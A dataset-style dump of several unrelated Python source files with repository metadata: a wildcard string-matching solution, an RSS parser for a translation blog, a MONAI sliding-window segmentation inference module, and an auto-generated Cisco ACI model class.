false else: return False # when we finish matching all chars in s, is pattern also finished? we cound only allow '*' at the rest of pattern while j < len(p) and p[j] == '*': j += 1 return j == len(p) def is_match_1(s, p): return is_match_rec(s, p, 0, 0) def is_match_rec(text, pattern, i, j): if i == len(text) and j == len(pattern): return True if j < len(pattern) and pattern[j] == '*': while j < len(pattern) - 1 and pattern[j + 1] == '*': j += 1 for k in range(i, len(text) + 1): if is_match_rec(text, pattern, k, j + 1): return True # if k >= len(text): # return False # if pattern[j] != '*' and k != j: # return False return False elif i < len(text) and j < len(pattern) and\ (pattern[j] == '?' or pattern[j] == text[i]): return is_match_rec(text, pattern, i + 1, j + 1) return False def is_match(s, p): string = list(s) pattern = list(p) write_index = 0 is_first = True # replace multiple * with one * # e.g a**b***c --> a*b*c for i in range(len(pattern)): if pattern[i] == '*': if is_first: pattern[write_index] = pattern[i] write_index += 1 is_first = False else: pattern[write_index] = pattern[i] write_index += 1 is_first = True table = [[False for i in range(write_index + 1)] for j in range(len(s) + 1)] if write_index > 0 and pattern[0] == '*': table[0][1] = True table[0][0] = True for i in range(1, len(table)): # string for j in range(1, len(table[0])): # pattern if pattern[j -1] == '?' or string[i - 1] == pattern[j - 1]: table[i][j] = table[i - 1][j - 1] elif pattern[j - 1] == '*': table[i][j] = table[i - 1][j] or table[i][j - 1] # print table return table[-1][-1] # print is_match('xaylmz', 'x?y*z') # print is_match('aab', 'c*a*b') # print is_match('aaa','aa') # print is_match('aa', '*') # print is_match('aa','a') # print is_match('aa','aa') # print is_match('ab', '?*') # print is_match('aa', 'a*') # print is_match('', '') # print is_match('zacabz', '*a?b*') # print('\n') # print is_match_1('xaylmz', 'x?y*z') # print is_match_1('aab', 'c*a*b') # print is_match_1('aaa','aa') # print is_match_1('aa', '*') # print is_match_1('aa','a') # print is_match_1('aa','aa') # print is_match_1('ab', '?*') # print is_match_1('aa', 'a*') # print is_match_1('', '') # print is_match_1('zacabz', '*a?b*') # print is_match_1('babaaababaabababbbbbbaabaabbabababbaababbaaabbbaaab', '***bba**a*bbba**aab**b') # print('\n') print is_match_2('xaylmz', 'x?y*z') print is_match_2('aab', 'c*a*b') print is_match_2('aaa','aa') print is_match_2('aa', '*') print is_match_2('aa','a') print is_match_2('aa','aa') print is_match_2('ab', '?*') print is_match_2('aa', 'a*') print is_match_2('', '') print is_match_2('zacabz', '*a?b*') print is_match_2('babaaababaabababbbbbbaabaabbabababbaababbaaabbbaaab', '***bba**a*bbba**aab**b')
[ "albert.agram@gmail.com" ]
albert.agram@gmail.com
ef815d59dad6b7592dd1e4fd7515e8cce1897def
6189f34eff2831e3e727cd7c5e43bc5b591adffc
/WebMirror/management/rss_parser_funcs/feed_parse_extractMasterpasterWordpressCom.py
4f0f90aed8ef9c7ad57e152828a2279189a98583
[ "BSD-3-Clause" ]
permissive
fake-name/ReadableWebProxy
24603660b204a9e7965cfdd4a942ff62d7711e27
ca2e086818433abc08c014dd06bfd22d4985ea2a
refs/heads/master
2023-09-04T03:54:50.043051
2023-08-26T16:08:46
2023-08-26T16:08:46
39,611,770
207
20
BSD-3-Clause
2023-09-11T15:48:15
2015-07-24T04:30:43
Python
UTF-8
Python
false
false
647
py
def extractMasterpasterWordpressCom(item): ''' Parser for 'masterpaster.wordpress.com' ''' vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol) or "preview" in item['title'].lower(): return None tagmap = [ ('shinmai', 'Shinmai Maou no Keiyakusha', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel'), ] for tagname, name, tl_type in tagmap: if tagname in item['tags']: return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
[ "something@fake-url.com" ]
something@fake-url.com
bbdfd97c6d54ce1442ecff7b01a9b00e9c63b75a
8bb950ffb6036dc89e78d89cb5dd633d8878ab08
/Phys_Seg/predict_case.py
f89c8f5f57db5001dba2b8125cb781f206090803
[ "Apache-2.0" ]
permissive
pedrob37/Phys_Seg
0d8a2be4188cf9a33cce079a8c99da54acaafda6
7adc65d7b228b3a5702acfa9e6d0494d6b4c2dee
refs/heads/main
2023-07-31T06:46:02.617742
2021-10-01T17:53:09
2021-10-01T18:23:18
387,182,741
2
0
null
null
null
null
UTF-8
Python
false
false
11,857
py
import torch import numpy as np from typing import Callable, Union import torch.nn.functional as F from monai.data.utils import compute_importance_map, dense_patch_slices, get_valid_patch_size from monai.utils import BlendMode, PytorchPadMode, fall_back_tuple # def pad_patient_3D(patient, shape_must_be_divisible_by=16, min_size=None): # if not (isinstance(shape_must_be_divisible_by, list) or isinstance(shape_must_be_divisible_by, tuple)): # shape_must_be_divisible_by = [shape_must_be_divisible_by] * 3 # shp = patient.shape # new_shp = [shp[0] + shape_must_be_divisible_by[0] - shp[0] % shape_must_be_divisible_by[0], # shp[1] + shape_must_be_divisible_by[1] - shp[1] % shape_must_be_divisible_by[1], # shp[2] + shape_must_be_divisible_by[2] - shp[2] % shape_must_be_divisible_by[2]] # for i in range(len(shp)): # if shp[i] % shape_must_be_divisible_by[i] == 0: # new_shp[i] -= shape_must_be_divisible_by[i] # if min_size is not None: # new_shp = np.max(np.vstack((np.array(new_shp), np.array(min_size))), 0) # return reshape_by_padding_upper_coords(patient, new_shp, 0), shp # def reshape_by_padding_upper_coords(image, new_shape, pad_value=None): # shape = tuple(list(image.shape)) # new_shape = tuple(np.max(np.concatenate((shape, new_shape)).reshape((2,len(shape))), axis=0)) # if pad_value is None: # if len(shape) == 2: # pad_value = image[0,0] # elif len(shape) == 3: # pad_value = image[0, 0, 0] # else: # raise ValueError("Image must be either 2 or 3 dimensional") # res = np.ones(list(new_shape), dtype=image.dtype) * pad_value # if len(shape) == 2: # res[0:0+int(shape[0]), 0:0+int(shape[1])] = image # elif len(shape) == 3: # res[0:0+int(shape[0]), 0:0+int(shape[1]), 0:0+int(shape[2])] = image # return res def image_preprocessing(patient_data): if len(patient_data.shape) < 5: shape_mismatch = 5 - len(patient_data.shape) patient_data = patient_data[(*([None] * shape_mismatch), ...)] # patient_data = patient_data.clone() p_mean, p_std = patient_data.mean(), patient_data.std() patient_data = patient_data - p_mean patient_data = patient_data / p_std return patient_data def physics_preprocessing(physics_input, experiment_type): physics_input = torch.from_numpy(physics_input[None, :]) if experiment_type == 'MPRAGE': TI_physics = physics_input[:, 0] # print(physics_input.shape) TR_physics = physics_input[:, 0] + physics_input[:, 1] TI_expo_physics = torch.exp(-physics_input[:, 0]) TR_expo_physics = torch.exp(-physics_input[:, 0] - physics_input[:, 1]) overall_physics = torch.cat((torch.stack((TI_physics, TR_physics), dim=1), torch.stack((TI_expo_physics, TR_expo_physics), dim=1)), dim=1) elif experiment_type == 'SPGR': TR_expo_params = torch.unsqueeze(torch.exp(-physics_input[:, 0]), dim=1) TE_expo_params = torch.unsqueeze(torch.exp(-physics_input[:, 1]), dim=1) FA_sin_params = torch.unsqueeze(torch.sin(physics_input[:, 2] * 3.14159265 / 180), dim=1) overall_physics = torch.cat((physics_input, torch.stack((TR_expo_params, TE_expo_params, FA_sin_params), dim=1).squeeze()), dim=1) return overall_physics.float() def custom_sliding_window_inference( inputs: Union[torch.Tensor, tuple], roi_size, sw_batch_size: int, predictor: Callable, overlap: float = 0.25, mode: Union[BlendMode, str] = BlendMode.CONSTANT, padding_mode: Union[PytorchPadMode, str] = PytorchPadMode.CONSTANT, cval=0, uncertainty_flag=False, num_loss_passes=20 ): """ Sliding window inference on `inputs` with `predictor`. When roi_size is larger than the inputs' spatial size, the input image are padded during inference. To maintain the same spatial sizes, the output image will be cropped to the original input size. Args: inputs: input image to be processed (assuming NCHW[D]) roi_size (list, tuple): the spatial window size for inferences. When its components have None or non-positives, the corresponding inputs dimension will be used. if the components of the `roi_size` are non-positive values, the transform will use the corresponding components of img size. For example, `roi_size=(32, -1)` will be adapted to `(32, 64)` if the second spatial dimension size of img is `64`. sw_batch_size: the batch size to run window slices. predictor: given input tensor `patch_data` in shape NCHW[D], `predictor(patch_data)` should return a prediction with the same spatial shape and batch_size, i.e. NMHW[D]; where HW[D] represents the patch spatial size, M is the number of output channels, N is `sw_batch_size`. overlap: Amount of overlap between scans. mode: {``"constant"``, ``"gaussian"``} How to blend output of overlapping windows. Defaults to ``"constant"``. - ``"constant``": gives equal weight to all predictions. - ``"gaussian``": gives less weight to predictions on edges of windows. padding_mode: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``} Padding mode when ``roi_size`` is larger than inputs. Defaults to ``"constant"`` See also: https://pytorch.org/docs/stable/nn.functional.html#pad cval: fill value for 'constant' padding mode. Default: 0 Raises: NotImplementedError: inputs must have batch_size=1. Note: - input must be channel-first and have a batch dim, support both spatial 2D and 3D. - currently only supports `inputs` with batch_size=1. """ assert 0 <= overlap < 1, "overlap must be >= 0 and < 1." # determine image spatial size and batch size # Note: all input images must have the same image size and batch size inputs_type = type(inputs) if inputs_type == tuple: phys_inputs = inputs[1] inputs = inputs[0] num_spatial_dims = len(inputs.shape) - 2 image_size_ = list(inputs.shape[2:]) batch_size = inputs.shape[0] # TODO: Enable batch sizes > 1 in future if batch_size > 1: raise NotImplementedError("inputs must have batch_size=1.") roi_size = fall_back_tuple(roi_size, image_size_) # in case that image size is smaller than roi size image_size = tuple(max(image_size_[i], roi_size[i]) for i in range(num_spatial_dims)) pad_size = [] for k in range(len(inputs.shape) - 1, 1, -1): diff = max(roi_size[k - 2] - inputs.shape[k], 0) half = diff // 2 pad_size.extend([half, diff - half]) inputs = F.pad(inputs, pad=pad_size, mode=PytorchPadMode(padding_mode).value, value=cval) scan_interval = _get_scan_interval(image_size, roi_size, num_spatial_dims, overlap) # Store all slices in list slices = dense_patch_slices(image_size, roi_size, scan_interval) # print(f'The slices are {slices}') slice_batches = [] for slice_index in range(0, len(slices), sw_batch_size): slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices))) input_slices = [] for curr_index in slice_index_range: curr_slice = slices[curr_index] if len(curr_slice) == 3: input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1], curr_slice[2]]) else: input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1]]) slice_batches.append(torch.stack(input_slices)) # Perform predictions output_rois = list() for data in slice_batches: if not uncertainty_flag and inputs_type == tuple: seg_prob, _ = predictor(data, phys_inputs) # batched patch segmentation output_rois.append(seg_prob) elif inputs_type != tuple: seg_prob, _ = predictor(data) # batched patch segmentation output_rois.append(seg_prob) # stitching output image output_classes = output_rois[0].shape[1] output_shape = [batch_size, output_classes] + list(image_size) # Create importance map importance_map = compute_importance_map(get_valid_patch_size(image_size, roi_size), mode=mode, device=inputs.device) # allocate memory to store the full output and the count for overlapping parts output_image = torch.zeros(output_shape, dtype=torch.float32, device=inputs.device) count_map = torch.zeros(output_shape, dtype=torch.float32, device=inputs.device) for window_id, slice_index in enumerate(range(0, len(slices), sw_batch_size)): slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices))) # store the result in the proper location of the full output. Apply weights from importance map. for curr_index in slice_index_range: curr_slice = slices[curr_index] if len(curr_slice) == 3: # print(output_image.shape, curr_slice, importance_map.shape, output_rois[window_id].shape) output_image[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += ( importance_map * output_rois[window_id][curr_index - slice_index, :] ) count_map[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += importance_map else: output_image[0, :, curr_slice[0], curr_slice[1]] += ( importance_map * output_rois[window_id][curr_index - slice_index, :] ) count_map[0, :, curr_slice[0], curr_slice[1]] += importance_map # account for any overlapping sections output_image /= count_map if num_spatial_dims == 3: return output_image[ ..., pad_size[4]: image_size_[0] + pad_size[4], pad_size[2]: image_size_[1] + pad_size[2], pad_size[0]: image_size_[2] + pad_size[0], ] return output_image[ ..., pad_size[2]: image_size_[0] + pad_size[2], pad_size[0]: image_size_[1] + pad_size[0] ] # 2D def _get_scan_interval(image_size, roi_size, num_spatial_dims: int, overlap: float): assert len(image_size) == num_spatial_dims, "image coord different from spatial dims." assert len(roi_size) == num_spatial_dims, "roi coord different from spatial dims." scan_interval = [] for i in range(num_spatial_dims): if roi_size[i] == image_size[i]: scan_interval.append(int(roi_size[i])) else: # scan interval is (1-overlap)*roi_size scan_interval.append(int(roi_size[i] * (1 - overlap))) return tuple(scan_interval) def predict_phys_seg(net, patient_data, processed_physics, main_device): with torch.no_grad(): # Pass data to GPU if main_device == 'cpu': pass else: # tensor = torch.from_numpy(array) patient_data = torch.from_numpy(patient_data).float().cuda(main_device) # Basic to begin with: Just run with net! print(patient_data.shape, processed_physics.shape) if processed_physics is not None: out = custom_sliding_window_inference( (patient_data, processed_physics.cuda(main_device)), 160, 1, net, overlap=0.3, mode='gaussian') else: out = custom_sliding_window_inference(patient_data, 160, 1, net, overlap=0.3, mode='gaussian') # Softmax pred_seg = torch.softmax(out, dim=1) # Permute and cast to numpy pred_seg = pred_seg.squeeze().permute(1, 2, 3, 0).cpu().numpy() return pred_seg
[ "p.borges.17@ucl.ac.uk" ]
p.borges.17@ucl.ac.uk
9b1e420a0e4354604283ca8f209c4beef3dcbce4
3c000380cbb7e8deb6abf9c6f3e29e8e89784830
/venv/Lib/site-packages/cobra/modelimpl/fv/rttoepgforepgtoepgtask.py
eb38250be2a5a73454884d50578ab1d72c276477
[]
no_license
bkhoward/aciDOM
91b0406f00da7aac413a81c8db2129b4bfc5497b
f2674456ecb19cf7299ef0c5a0887560b8b315d0
refs/heads/master
2023-03-27T23:37:02.836904
2021-03-26T22:07:54
2021-03-26T22:07:54
351,855,399
0
0
null
null
null
null
UTF-8
Python
false
false
18,769
py
# coding=UTF-8 # ********************************************************************** # Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved # written by zen warriors, do not modify! # ********************************************************************** from cobra.mit.meta import ClassMeta from cobra.mit.meta import StatsClassMeta from cobra.mit.meta import CounterMeta from cobra.mit.meta import PropMeta from cobra.mit.meta import Category from cobra.mit.meta import SourceRelationMeta from cobra.mit.meta import NamedSourceRelationMeta from cobra.mit.meta import TargetRelationMeta from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory from cobra.model.category import MoCategory, PropCategory, CounterCategory from cobra.mit.mo import Mo # ################################################## class RtToEpgForEpgToEpgTask(Mo): """ Mo doc not defined in techpub!!! """ meta = ClassMeta("cobra.model.fv.RtToEpgForEpgToEpgTask") meta.moClassName = "fvRtToEpgForEpgToEpgTask" meta.rnFormat = "fvRtToEpgForEpgToEpgTask-%(id)s" meta.category = MoCategory.TASK meta.label = "None" meta.writeAccessMask = 0x1 meta.readAccessMask = 0x1 meta.isDomainable = False meta.isReadOnly = True meta.isConfigurable = False meta.isDeletable = False meta.isContextRoot = False meta.parentClasses.add("cobra.model.action.LicensemgrSubj") meta.parentClasses.add("cobra.model.action.StreamelemSubj") meta.parentClasses.add("cobra.model.action.ObserverSubj") meta.parentClasses.add("cobra.model.action.SnmpdSubj") meta.parentClasses.add("cobra.model.action.VmmmgrSubj") meta.parentClasses.add("cobra.model.action.AnalyticsSubj") meta.parentClasses.add("cobra.model.action.ScripthandlerSubj") meta.parentClasses.add("cobra.model.action.ConfelemSubj") meta.parentClasses.add("cobra.model.action.GoobserverelemSubj") meta.parentClasses.add("cobra.model.action.EventmgrSubj") meta.parentClasses.add("cobra.model.action.OspaelemSubj") meta.parentClasses.add("cobra.model.action.VtapSubj") meta.parentClasses.add("cobra.model.action.GohealthelemSubj") meta.parentClasses.add("cobra.model.action.OshSubj") meta.parentClasses.add("cobra.model.action.DhcpdSubj") meta.parentClasses.add("cobra.model.action.OpflexelemSubj") meta.parentClasses.add("cobra.model.action.DomainmgrSubj") meta.parentClasses.add("cobra.model.action.DbgrelemSubj") meta.parentClasses.add("cobra.model.action.CloudpeSubj") meta.parentClasses.add("cobra.model.action.PlgnhandlerSubj") meta.parentClasses.add("cobra.model.action.TopomgrSubj") meta.parentClasses.add("cobra.model.action.VleafelemSubj") meta.parentClasses.add("cobra.model.action.NxosmockSubj") meta.parentClasses.add("cobra.model.action.DbgrSubj") meta.parentClasses.add("cobra.model.action.PlatformmgrSubj") meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj") meta.parentClasses.add("cobra.model.action.OpflexpSubj") meta.parentClasses.add("cobra.model.action.BootmgrSubj") meta.parentClasses.add("cobra.model.action.AeSubj") meta.parentClasses.add("cobra.model.action.GoeventelemSubj") meta.parentClasses.add("cobra.model.action.GoconnectorSubj") meta.parentClasses.add("cobra.model.action.PolicymgrSubj") meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj") meta.parentClasses.add("cobra.model.action.ObserverelemSubj") meta.parentClasses.add("cobra.model.action.PolicyelemSubj") meta.parentClasses.add("cobra.model.action.PolicydistSubj") meta.parentClasses.add("cobra.model.action.IdmgrSubj") meta.parentClasses.add("cobra.model.action.EdmgrSubj") meta.superClasses.add("cobra.model.action.RInst") meta.superClasses.add("cobra.model.pol.ComplElem") meta.superClasses.add("cobra.model.task.Inst") meta.superClasses.add("cobra.model.action.Inst") meta.rnPrefixes = [ ('fvRtToEpgForEpgToEpgTask-', True), ] prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("deleteAll", "deleteall", 16384) prop._addConstant("deleteNonPresent", "deletenonpresent", 8192) prop._addConstant("ignore", "ignore", 4096) meta.props.add("childAction", prop) prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR) prop.label = "Data" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 512)] meta.props.add("data", prop) prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR) prop.label = "Description" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 128)] prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+'] meta.props.add("descr", prop) prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN) prop.label = "None" prop.isDn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("dn", prop) prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("endTs", prop) prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR) prop.label = "Fail" prop.isImplicit = True prop.isAdmin = True meta.props.add("fail", prop) prop = PropMeta("str", "flags", "flags", 30392, PropCategory.REGULAR) prop.label = "Flags" prop.isImplicit = True prop.isAdmin = True meta.props.add("flags", prop) prop = PropMeta("str", "id", "id", 25948, PropCategory.REGULAR) prop.label = "ID" prop.isConfig = True prop.isAdmin = True prop.isCreateOnly = True prop.isNaming = True prop.defaultValue = 0 prop.defaultValueStr = "none" prop._addConstant("DbgacEpgForEpgToEpg", "dbgacepgforepgtoepg", 2267) prop._addConstant("none", "none", 0) meta.props.add("id", prop) prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR) prop.label = "Remote Error Code" prop.isImplicit = True prop.isAdmin = True prop._addConstant("ERR-FILTER-illegal-format", None, 1140) prop._addConstant("ERR-FSM-no-such-state", None, 1160) prop._addConstant("ERR-HTTP-set-error", None, 1551) prop._addConstant("ERR-HTTPS-set-error", None, 1552) prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130) prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122) prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121) prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120) prop._addConstant("ERR-MO-access-denied", None, 1170) prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107) prop._addConstant("ERR-MO-duplicate-object", None, 1103) prop._addConstant("ERR-MO-illegal-containment", None, 1106) prop._addConstant("ERR-MO-illegal-creation", None, 1105) prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100) prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101) prop._addConstant("ERR-MO-naming-rule-violation", None, 1104) prop._addConstant("ERR-MO-object-not-found", None, 1102) prop._addConstant("ERR-MO-resource-allocation", None, 1150) prop._addConstant("ERR-aaa-config-modify-error", None, 1520) prop._addConstant("ERR-acct-realm-set-error", None, 1513) prop._addConstant("ERR-add-ctrlr", None, 1574) prop._addConstant("ERR-admin-passwd-set", None, 1522) prop._addConstant("ERR-api", None, 1571) prop._addConstant("ERR-auth-issue", None, 1548) prop._addConstant("ERR-auth-realm-set-error", None, 1514) prop._addConstant("ERR-authentication", None, 1534) prop._addConstant("ERR-authorization-required", None, 1535) prop._addConstant("ERR-connect", None, 1572) prop._addConstant("ERR-create-domain", None, 1562) prop._addConstant("ERR-create-keyring", None, 1560) prop._addConstant("ERR-create-role", None, 1526) prop._addConstant("ERR-create-user", None, 1524) prop._addConstant("ERR-delete-domain", None, 1564) prop._addConstant("ERR-delete-role", None, 1528) prop._addConstant("ERR-delete-user", None, 1523) prop._addConstant("ERR-domain-set-error", None, 1561) prop._addConstant("ERR-http-initializing", None, 1549) prop._addConstant("ERR-incompat-ctrlr-version", None, 1568) prop._addConstant("ERR-internal-error", None, 1540) prop._addConstant("ERR-invalid-args", None, 1569) prop._addConstant("ERR-invalid-delimiter", None, 1589) prop._addConstant("ERR-invalid-domain", None, 1588) prop._addConstant("ERR-invalid-domain-name", None, 1582) prop._addConstant("ERR-ldap-delete-error", None, 1510) prop._addConstant("ERR-ldap-get-error", None, 1509) prop._addConstant("ERR-ldap-group-modify-error", None, 1518) prop._addConstant("ERR-ldap-group-set-error", None, 1502) prop._addConstant("ERR-ldap-set-error", None, 1511) prop._addConstant("ERR-missing-method", None, 1546) prop._addConstant("ERR-modify-ctrlr-access", None, 1567) prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576) prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575) prop._addConstant("ERR-modify-ctrlr-scope", None, 1573) prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577) prop._addConstant("ERR-modify-domain", None, 1563) prop._addConstant("ERR-modify-domain-encapmode", None, 1581) prop._addConstant("ERR-modify-domain-enfpref", None, 1578) prop._addConstant("ERR-modify-domain-mcastpool", None, 1579) prop._addConstant("ERR-modify-domain-mode", None, 1580) prop._addConstant("ERR-modify-domain-prefencapmode", None, 1584) prop._addConstant("ERR-modify-role", None, 1527) prop._addConstant("ERR-modify-user", None, 1525) prop._addConstant("ERR-modify-user-domain", None, 1565) prop._addConstant("ERR-modify-user-role", None, 1532) prop._addConstant("ERR-no-buf", None, 1570) prop._addConstant("ERR-passwd-set-failure", None, 1566) prop._addConstant("ERR-provider-group-modify-error", None, 1519) prop._addConstant("ERR-provider-group-set-error", None, 1512) prop._addConstant("ERR-radius-global-set-error", None, 1505) prop._addConstant("ERR-radius-group-set-error", None, 1501) prop._addConstant("ERR-radius-set-error", None, 1504) prop._addConstant("ERR-request-timeout", None, 1545) prop._addConstant("ERR-role-set-error", None, 1515) prop._addConstant("ERR-rsa-global-set-error", None, 1587) prop._addConstant("ERR-rsa-group-set-error", None, 1585) prop._addConstant("ERR-rsa-set-error", None, 1586) prop._addConstant("ERR-secondary-node", None, 1550) prop._addConstant("ERR-service-not-ready", None, 1539) prop._addConstant("ERR-set-password-strength-check", None, 1543) prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521) prop._addConstant("ERR-tacacs-enable-error", None, 1508) prop._addConstant("ERR-tacacs-global-set-error", None, 1507) prop._addConstant("ERR-tacacs-group-set-error", None, 1503) prop._addConstant("ERR-tacacs-set-error", None, 1506) prop._addConstant("ERR-user-account-expired", None, 1536) prop._addConstant("ERR-user-set-error", None, 1517) prop._addConstant("ERR-xml-parse-error", None, 1547) prop._addConstant("communication-error", "communication-error", 1) prop._addConstant("none", "none", 0) meta.props.add("invErrCode", prop) prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR) prop.label = "Remote Error Description" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 128)] prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+'] meta.props.add("invErrDescr", prop) prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR) prop.label = "Remote Result" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "not-applicable" prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384) prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192) prop._addConstant("capability-not-supported", "capability-not-supported", 32768) prop._addConstant("capability-unavailable", "capability-unavailable", 65536) prop._addConstant("end-point-failed", "end-point-failed", 32) prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64) prop._addConstant("end-point-unavailable", "end-point-unavailable", 16) prop._addConstant("extend-timeout", "extend-timeout", 134217728) prop._addConstant("failure", "failure", 1) prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304) prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608) prop._addConstant("fru-not-ready", "fru-not-ready", 67108864) prop._addConstant("fru-not-supported", "fru-not-supported", 536870912) prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432) prop._addConstant("fw-defect", "fw-defect", 256) prop._addConstant("hw-defect", "hw-defect", 512) prop._addConstant("illegal-fru", "illegal-fru", 16777216) prop._addConstant("intermittent-error", "intermittent-error", 1073741824) prop._addConstant("internal-error", "internal-error", 4) prop._addConstant("not-applicable", "not-applicable", 0) prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048) prop._addConstant("resource-dependency", "resource-dependency", 4096) prop._addConstant("resource-unavailable", "resource-unavailable", 1024) prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144) prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072) prop._addConstant("service-not-supported", "service-not-supported", 524288) prop._addConstant("service-protocol-error", "service-protocol-error", 2097152) prop._addConstant("service-unavailable", "service-unavailable", 1048576) prop._addConstant("sw-defect", "sw-defect", 128) prop._addConstant("task-reset", "task-reset", 268435456) prop._addConstant("timeout", "timeout", 8) prop._addConstant("unidentified-fail", "unidentified-fail", 2) meta.props.add("invRslt", prop) prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "local" prop._addConstant("implicit", "implicit", 4) prop._addConstant("local", "local", 0) prop._addConstant("policy", "policy", 1) prop._addConstant("replica", "replica", 2) prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3) meta.props.add("lcOwn", prop) prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("modTs", prop) prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR) prop.label = "Subject DN" prop.isImplicit = True prop.isAdmin = True meta.props.add("oDn", prop) prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR) prop.label = "Completion" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "scheduled" prop._addConstant("cancelled", "cancelled", 3) prop._addConstant("completed", "completed", 2) prop._addConstant("crashsuspect", "crash-suspect", 7) prop._addConstant("failed", "failed", 4) prop._addConstant("indeterminate", "indeterminate", 5) prop._addConstant("processing", "processing", 1) prop._addConstant("ready", "ready", 8) prop._addConstant("scheduled", "scheduled", 0) prop._addConstant("suspended", "suspended", 6) meta.props.add("operSt", prop) prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = False prop.defaultValueStr = "no" prop._addConstant("no", None, False) prop._addConstant("yes", None, True) meta.props.add("originMinority", prop) prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN) prop.label = "None" prop.isRn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("rn", prop) prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR) prop.label = "ID" prop.isImplicit = True prop.isAdmin = True meta.props.add("runId", prop) prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("startTs", prop) prop = PropMeta("str", "startTx", "startTx", 36895, PropCategory.REGULAR) prop.label = "startTxId" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "none" prop._addConstant("none", "none", 0) meta.props.add("startTx", prop) prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("created", "created", 2) prop._addConstant("deleted", "deleted", 8) prop._addConstant("modified", "modified", 4) meta.props.add("status", prop) prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR) prop.label = "Try" prop.isImplicit = True prop.isAdmin = True meta.props.add("try", prop) prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("ts", prop) meta.namingProps.append(getattr(meta.props, "id")) def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps): namingVals = [id] Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps) # End of package file # ##################################################
[ "bkhoward@live.com" ]
bkhoward@live.com
9f6345850132d48dabb1e26044ea02ea449056c4
4c9a5f1b44ad6fa84a984b8164414c99aba7f391
